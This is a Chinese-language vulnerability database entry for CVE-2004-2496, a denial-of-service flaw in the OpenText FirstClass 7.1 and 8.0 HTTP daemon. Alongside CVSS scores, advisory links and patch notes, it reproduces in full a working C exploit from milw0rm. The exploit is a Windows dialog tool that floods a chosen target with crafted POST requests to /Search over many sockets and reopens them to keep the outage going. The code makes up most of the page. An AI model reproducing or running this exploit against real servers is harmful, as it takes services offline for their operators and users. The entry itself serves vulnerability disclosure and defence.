CVE-2004-2496
CVSS7.8
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:18
NMCOE    

[原文]The HTTP daemon in OpenText FirstClass 7.1 and 8.0 allows remote attackers to cause a denial of service (service availability loss) via a large number of POST requests to /Search.


[CNNVD]OpenText FirstClass HTTP Daemon Search函数服务拒绝漏洞(CNNVD-200412-610)

        OpenText FirstClass 7.1和8.0版本的HTTP守护程序存在漏洞。远程攻击者可以借助许多对/Search的POST请求导致服务拒绝(服务有效性丢失)。

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2496
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2496
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-610
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/18424
(UNKNOWN)  XF  firstclass-dos(18424)
http://www.securityfocus.com/bid/11877
(UNKNOWN)  BID  11877
http://www.osvdb.org/12350
(UNKNOWN)  OSVDB  12350
http://securitytracker.com/id?1012478
(UNKNOWN)  SECTRACK  1012478
http://secunia.com/advisories/13415
(VENDOR_ADVISORY)  SECUNIA  13415
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0321.html
(VENDOR_ADVISORY)  FULLDISC  20041214 OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS Vulnerability

- 漏洞信息

OpenText FirstClass HTTP Daemon Search函数服务拒绝漏洞
高危 其他
2004-12-31 00:00:00 2006-09-05 00:00:00
远程  
        OpenText FirstClass 7.1和8.0版本的HTTP守护程序存在漏洞。远程攻击者可以借助许多对/Search的POST请求导致服务拒绝(服务有效性丢失)。

- 公告与补丁

        A fix is available to address this vulnerability. Customers are advised to contact the vendor for further details in regard to obtaining and applying an appropriate fix.

- 漏洞信息 (687)

OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS (EDBID:687)
windows dos
2004-12-15 Verified
0 dila
N/A [点击下载]
/*
   http://secunia.com/advisories/13415
   written by dila
   released on 11.12.04
   compile with ms vc++
   remember to link with winsock
*/

#define WIN32_LEAN_AND_MEAN 
#include "windows.h"
#define IDD_MAIN                        101
#define IDI_MAIN                        103
#define IDC_SERV                        1000
#define IDC_SOCKS                       1002
#define IDHALT                          1004

// Next default values for new objects
// 
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE        104
#define _APS_NEXT_COMMAND_VALUE         40001
#define _APS_NEXT_CONTROL_VALUE         1005
#define _APS_NEXT_SYMED_VALUE           101
#endif
#endif // Combined resource.h - milw0rm.com
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>

#define WM_WSAASYNC (WM_USER +5)

BOOL CALLBACK DlgProc(HWND hDlg, UINT uMsg, WPARAM wParam, LPARAM lParam);
int startupClient(HWND hDlg);
void StopDoS();
void EnableDoSButton(HWND hDlg);
void DisableDoSButton(HWND hDlg);

struct hostent *host_entry;
struct sockaddr_in server;

WSAData wsaData;
char *request="POST /Search HTTP/1.1\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\nAccept-Language: en-us\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\nContent-Length: 291\nConnection: Keep-Alive\nCache-Control: no-cache\n\nCharSet=ISO-8859-1&FieldID%3A1211.0%3DLONG=0&FieldID%3A1202%3DSTRING=&FieldID%3A1208%3DCHECKBOX=on&FieldID%3A1206%3DCHECKBOX=on&FieldID%3A1204%3DCHECKBOX=on&FieldID%3A1207%3DCHECKBOX=on&FieldID%3A1205%3DCHECKBOX=on&FieldID%3A1209%3DCHECKBOX=on&FieldID%3A1212%3DCHECKBOX=on&Input%3A1211.0=+--\n\n";
char target[101];
__int64 timer;
int *mySocket, sockets=256, isDoS=0, sustain=0, count=0;

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
	DialogBoxParam(hInstance, MAKEINTRESOURCE(IDD_MAIN), NULL, (DLGPROC)DlgProc, 0);
	return 0; 
}

BOOL CALLBACK DlgProc(HWND hDlg, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	switch(uMsg)
	{
		case WM_INITDIALOG:
			int error;
			if ((error = WSAStartup(MAKEWORD(2, 2), &wsaData)) == SOCKET_ERROR){ MessageBox(hDlg, "Could not initialize winsock! Try looking for a winsock update.", "Fatal Error", MB_OK|MB_ICONSTOP); SendMessage(hDlg, WM_CLOSE, 0, 0); }
			EnableDoSButton(hDlg);
			SetDlgItemText(hDlg, IDC_SERV, "");
			SetDlgItemInt(hDlg, IDC_SOCKS, 256, 0);
			return(false);
		case WM_COMMAND:
			if(wParam==IDOK)
			{
				DisableDoSButton(hDlg);
				EnableWindow(GetDlgItem(hDlg, IDHALT), 0);
				GetDlgItemText(hDlg, IDC_SERV, target, 100);
				sockets = GetDlgItemInt(hDlg, IDC_SOCKS, 0, 0);
				if(sockets<2){
					MessageBox(hDlg, "You need more sockets to cause a DoS!", "User Error", MB_OK|MB_ICONWARNING);
					EnableDoSButton(hDlg);
				}else if(strlen(target)<1){
					MessageBox(hDlg, "You need to specify a target!", "User Error", MB_OK|MB_ICONWARNING);
					EnableDoSButton(hDlg);
			}else if(!gethostbyname(target)){
					MessageBox(hDlg, "Unable to resolve target!", "DNS Error", MB_OK|MB_ICONWARNING);
					EnableDoSButton(hDlg);
				}else
				{
					DisableDoSButton(hDlg);
					host_entry = gethostbyname(target);
					server.sin_family = AF_INET;
					server.sin_port = htons(80);
					server.sin_addr.s_addr = *(unsigned long*) host_entry->h_addr;
					mySocket = (int*)realloc(mySocket, sizeof(int)*sockets);
					if(mySocket==NULL){
						mySocket = (int*)realloc(mySocket, sizeof(int)*sockets);
						if(mySocket==NULL){
							SetFocus(hDlg);
							MessageBox(hDlg, "Too many sockets and not enough memory.", "Memory allocation failed!", MB_OK|MB_ICONWARNING);
							EnableDoSButton(hDlg);
						}
					}else{
						memset(mySocket, 0, sizeof(mySocket));
						isDoS=1;
						PostMessage(hDlg, WM_WSAASYNC, 0, 0);
					}
				}
			}else if(wParam==IDHALT)
			{
				sustain=0;
				count=0;
				isDoS=0;
				StopDoS();
				EnableDoSButton(hDlg);
				SetFocus(hDlg);
				StopDoS();
				MessageBox(hDlg, "All sockets have been shutdown!", "Information", MB_OK|MB_ICONINFORMATION);
			}
			return(false);
		case WM_CLOSE:
			WSACleanup();
			DestroyWindow(hDlg);
			return(true);
		case WM_WSAASYNC:
			if(isDoS)
			{
				mySocket[count] = startupClient(hDlg);
				SetDlgItemInt(hDlg, IDC_SOCKS, sockets-count, 0);
				if(count<sockets) count++;
				else{
					count=0;
					isDoS=0;
					sustain=1;
					EnableWindow(GetDlgItem(hDlg, IDHALT), 0);
					SetFocus(hDlg);
					MessageBox(hDlg, "DoS in progress! Click OK to release sockets.", "Information", MB_OK|MB_ICONINFORMATION);
					PostMessage(hDlg, WM_COMMAND, IDHALT, 0);
				}
			}else if(sustain==1)
			{
				if(GetTickCount()>timer)
				{
					int fcount;
					for(fcount=0; fcount<sockets+1; fcount++) if(mySocket[fcount]==0) break;
					if(fcount==sockets && mySocket[fcount]!=0)
					{
						MessageBox(hDlg, "all sockets where disconnected!", "DEBUG", MB_OK);
					}else{
						mySocket[fcount] = startupClient(hDlg);
					}
					timer=GetTickCount()+1000;
				}
			}
			if(WSAGETSELECTEVENT(lParam)==FD_CONNECT)
			{
				send(wParam, request, strlen(request), 0);
			}else if(WSAGETSELECTEVENT(lParam)==FD_CLOSE)
			{
				if(isDoS)
				{
					int icount;
					for(icount=0; icount<sockets+1; icount++) if((unsigned int)mySocket[icount]==wParam) break;
					closesocket(wParam);
					mySocket[icount] = startupClient(hDlg);
				}else if(sustain)
				{
					int icount;
					for(icount=0; icount<sockets+1; icount++) if((unsigned int)mySocket[icount]==wParam) break;
					closesocket(wParam);
					mySocket[icount] = startupClient(hDlg);
				}
			}
	}
	return(false);
}

int startupClient(HWND hDlg) {
	int tmpSocket = socket(AF_INET, SOCK_STREAM, 0);
	if (tmpSocket == SOCKET_ERROR) return 0;
	WSAAsyncSelect(tmpSocket, hDlg, WM_WSAASYNC, FD_CONNECT|FD_CLOSE);
	int error = connect(tmpSocket, (sockaddr*)&server, sizeof(server));
	if(error) tmpSocket=0;
	return tmpSocket;
}

void StopDoS()
{
	int hcount;
	for(hcount=0; hcount<sockets+1; hcount++) closesocket(mySocket[hcount]);
}

void EnableDoSButton(HWND hDlg)
{
	EnableWindow(GetDlgItem(hDlg, IDHALT), 0);
	EnableWindow(GetDlgItem(hDlg, IDC_SERV), 1);
	EnableWindow(GetDlgItem(hDlg, IDC_SOCKS), 1);
	EnableWindow(GetDlgItem(hDlg, IDOK), 1);
}

void DisableDoSButton(HWND hDlg)
{
	EnableWindow(GetDlgItem(hDlg, IDOK), 0);
	EnableWindow(GetDlgItem(hDlg, IDC_SERV), 0);
	EnableWindow(GetDlgItem(hDlg, IDC_SOCKS), 0);
	EnableWindow(GetDlgItem(hDlg, IDHALT), 1);
}

// milw0rm.com [2004-12-15]
		

- 漏洞信息

12350
FirstClass /Search Large Request Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Unknown

- 漏洞描述

FirstClass contains a flaw that may allow a remote denial of service. The issue is triggered when numerous POST requests from different connection to /Search occurs, and will result in loss of availability for the service.

- 时间线

2004-12-14 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, OpenText Corporation has released a patched version to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站